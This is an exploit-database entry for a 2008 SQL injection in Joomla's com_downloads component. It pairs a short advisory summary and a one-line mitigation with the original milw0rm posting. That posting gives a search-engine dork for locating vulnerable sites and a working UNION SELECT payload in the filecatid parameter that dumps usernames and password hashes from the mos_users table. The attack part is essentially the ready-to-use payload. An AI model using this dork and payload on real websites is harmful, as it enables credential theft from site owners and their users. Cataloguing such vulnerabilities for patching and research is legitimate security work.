header-logo
Suggest Exploit
vendor:
com_downloads
by:
S@BUN
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_downloads
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla SQL Injection (com_downloads)(filecatid)

An attacker can exploit a SQL injection vulnerability in Joomla's com_downloads component to gain access to sensitive information from the database. The vulnerability is due to insufficient sanitization of user-supplied input to the 'filecatid' parameter of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This may allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in SQL statements.
Source

Exploit-DB raw data:

#########################################################################
#
# joomla SQL Injection(com_downloads)(filecatid)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
#
#########################################################################
#
# DORKS 1 : allinurl :"com_downloads"filecatid
#
##########################################################################
EXPLOIT :

index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*


##########################################################################
# S@BUN                           www.hackturkiye.com                     S@BUN
##########################################################################
# S@BUN                              i AM NOT HACKER                      S@BUN
##########################################################################

# milw0rm.com [2008-02-06]